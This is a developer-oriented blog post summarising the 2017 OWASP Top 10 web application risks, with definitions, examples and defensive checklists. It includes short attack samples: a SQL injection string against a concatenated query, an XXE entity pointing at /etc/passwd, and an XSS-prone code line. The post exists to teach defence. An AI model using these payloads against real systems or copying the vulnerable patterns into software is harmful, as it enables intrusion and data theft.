OWASP's Top 10 Web Application Security Threats for Developers
Written on
About OWASP
The Open Web Application Security Project (OWASP) is a non-profit organization and an open community focused on helping businesses implement cost-effective methods for secure software development, testing, and application maintenance. OWASP emphasizes the integration of people, processes, and technology to address both existing and emerging issues in secure application development, utilizing resources such as libraries, security tools, and industry standards. The sustainability of OWASP's initiatives relies on the contributions of volunteers, including board members, chapter leaders, and project teams.
The OWASP Top 10 – 2017!
In 2017, after gathering data from over 40 established application security firms and surveying 500 individuals, OWASP released its "Top 10 Web Application Security Risks." This list was derived from vulnerability data and prioritized based on its prevalence across hundreds of organizations and over 100,000 applications and APIs. Identifying security vulnerabilities in applications can often be a complex task. Therefore, a comprehensive approach that combines advanced tools with an informed security mindset is essential for detecting and resolving these weaknesses.
What is the Risk?
The OWASP Top 10 primarily identifies the most critical web application security risks encountered by organizations. For each risk, OWASP provides potential information about likelihood and business impact analysis (BIA) using a rating system based on its Risk Rating Methodology. The top vulnerabilities correspond with the Common Weakness Enumeration (CWE) for software weaknesses.
What are Application Security Risks?
The internet has become significantly more resourceful for intruders over the past decade, equipped with various Tactics, Techniques, and Procedures (TTPs), alongside tools to exploit vulnerabilities in applications or organizational infrastructures. Every vulnerability poses a potential risk that can be exploited. To assess the business impact on your organization, adopting a risk management framework is advisable to identify, analyze, and evaluate risks based on the likelihood associated with each threat, attack vector, and security weakness—these factors ultimately determine your overall risk.
Scope of Context:
ASR1:2017 - Injection
Injection flaws occur when an attacker sends untrusted data to an interpreter as part of a command or query, potentially enabling unauthorized reading, writing, or executing of data.
Examples: An attacker might alter the ‘id’ parameter in their browser as follows: https://webABC.com/app/accountView?id=' or '1'='1 If an application constructs a vulnerable SQL call using untrusted data: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
Application Checklist: * User-supplied data must be validated, filtered, or sanitized. * Dynamic queries or non-parameterized calls should not be used without escaping. * Sensitive record data should not be used within object-relational mapping (ORM). * Hostile data should not be concatenated in dynamic queries.
Utilizing automated testing tools alongside standard source code review methodologies can help uncover injection vulnerabilities across various data inputs including headers, parameters, cookies, URLs, JSON, SOAP, and XML. For secure Software Development Lifecycle (SDL) practices, consult Microsoft’s guidelines.
ASR2:2017 - Broken Authentication
Broken authentication typically arises from improper implementation of authentication and session management functions, leading to vulnerabilities that attackers can exploit to compromise keys, passwords, and session tokens.
Examples: Credential Stuffing: Using known password lists; if an application lacks automated protections, attackers can validate credentials using a password oracle. Authentication Attacks: Often result from reliance on passwords as the sole authentication factor. Session Timeouts: Ensure server-side status changes based on user sessions.
Application Authentication Weaknesses Checklist: * Automated scripts can exploit credential stuffing using valid username/password lists. * Vulnerable to brute force or similar automated attacks. * Default passwords should not be used. * Weak credential recovery methods can lead to vulnerabilities. * Multi-Factor Authentication (MFA) should be enabled effectively. * Session IDs should not be exposed in URLs. * Session IDs must be properly rotated and invalidated.
ASR3:2017 - Sensitive Data Exposure
Many web applications and APIs inadequately protect sensitive data, such as personally identifiable information (PII) in sectors like finance and healthcare. Insufficient data protection frameworks, policies, and encryption lead to data tampering, theft, and fraud.
Examples: Application Encryption Process: If credit card numbers are encrypted in a database but decrypted upon retrieval, attackers can exploit this to access plaintext data. Session Hijacking: Without Transport Layer Security (TLS) or using deprecated SSL protocols, attackers can intercept connections and hijack sessions. Unsalted Hashing: Password databases that lack salting or proper hashing mechanisms expose themselves to attacks.
Checklist: Determine the protection requirements for data in use, in transit, and at rest. Be aware of regulations like GDPR and PCI DSS.
ASR4:2017 - XML External Entities (XXE)
XML entity values loaded from outside the Document Type Definition (DTD) can lead to vulnerabilities. Poor configuration allows attackers to exploit external entities to disclose internal files or execute remote code.
Examples: An attacker could use: <!--?xml version="1.0" encoding="ISO-8859-1"?--> <!--ENTITY xxe SYSTEM "file:///etc/passwd" -->
Checklist: * Applications that accept XML from untrusted sources without proper validation are at risk. * XML processors that enable DTDs are particularly vulnerable.
ASR5:2017 - Broken Access Control
Access Control (AC) must enforce strict permission policies. Broken Access Control (BAC) enables attackers to exploit flaws to gain unauthorized access to sensitive data.
Examples: 1. By manipulating the ‘acct’ parameter in a SQL call, attackers can access other user accounts. http://testing.com/app/accountInfo?acct=notmyacct
Checklist: * Ensure access control checks cannot be bypassed through URL manipulation or other methods. * Prevent unauthorized record access through primary key modification.
ASR6:2017 - Security Misconfiguration
Failure to implement necessary security controls can expose applications and servers to significant vulnerabilities. Many developers rely on default configurations.
Examples: Application Server: A production server may still host sample applications, which can be exploited. Directory Listing: If not disabled, attackers can discover and exploit listed directories. Server Configuration: Detailed error messages may expose sensitive information.
Checklist: * Identify and rectify any missing security hardening measures. * Ensure default accounts and passwords are not in use.
ASR7:2017 - Cross-Site Scripting (XSS)
XSS vulnerabilities occur when untrusted data is included in web pages without proper validation, enabling attackers to execute scripts in victims' browsers.
Examples: An application may inadvertently send a user’s session ID to an attacker's site. page += "<input name='creditcard' type='TEXT' value='request.getParameter('cc')' />";
Checklist: Three primary types of XSS attacks: * Reflected XSS: Immediate output of unvalidated user input. * Stored XSS: Unsanitized input stored for later access. * DOM XSS: Vulnerabilities in single-page applications or JavaScript frameworks.
ASR8:2017 - Insecure Deserialization
Insecure deserialization can lead to remote code execution by exploiting known vulnerabilities in applications.
Examples: Attackers can utilize tools like Java Serial Killer to exploit deserialization flaws.
Checklist: * Vulnerabilities increase when APIs deserialize data from untrusted sources.
ASR9:2017 - Using Components with Known Vulnerabilities
Production environments often use third-party tools with known vulnerabilities, posing significant risks.
Examples: * CVE-2017–5638: A flaw that allows remote command execution during file uploads.
Checklist: * Maintain awareness of component versions in your environment.
ASR10:2017 - Insufficient Logging & Monitoring
Insufficient logging can hinder incident response and forensic analysis, making it crucial to enable logging across applications and services.
Examples: An attacker may erase traces of their activities, making detection difficult.
Checklist: * Ensure important events are logged and monitored effectively.
— — — — — — — — — — — — — THE END — — — — — — — — — — — —
Quote of the Day: One must not tie a ship to a single anchor, nor life to a single hope — Epictetus
Thank you for reading! Have a great day!
Join FAUN today for weekly tech stories, news, and tutorials.
Follow us on Twitter, Facebook, and Instagram, and join our Facebook and LinkedIn groups!
If you found this post helpful, please show your support by clicking the clap button below!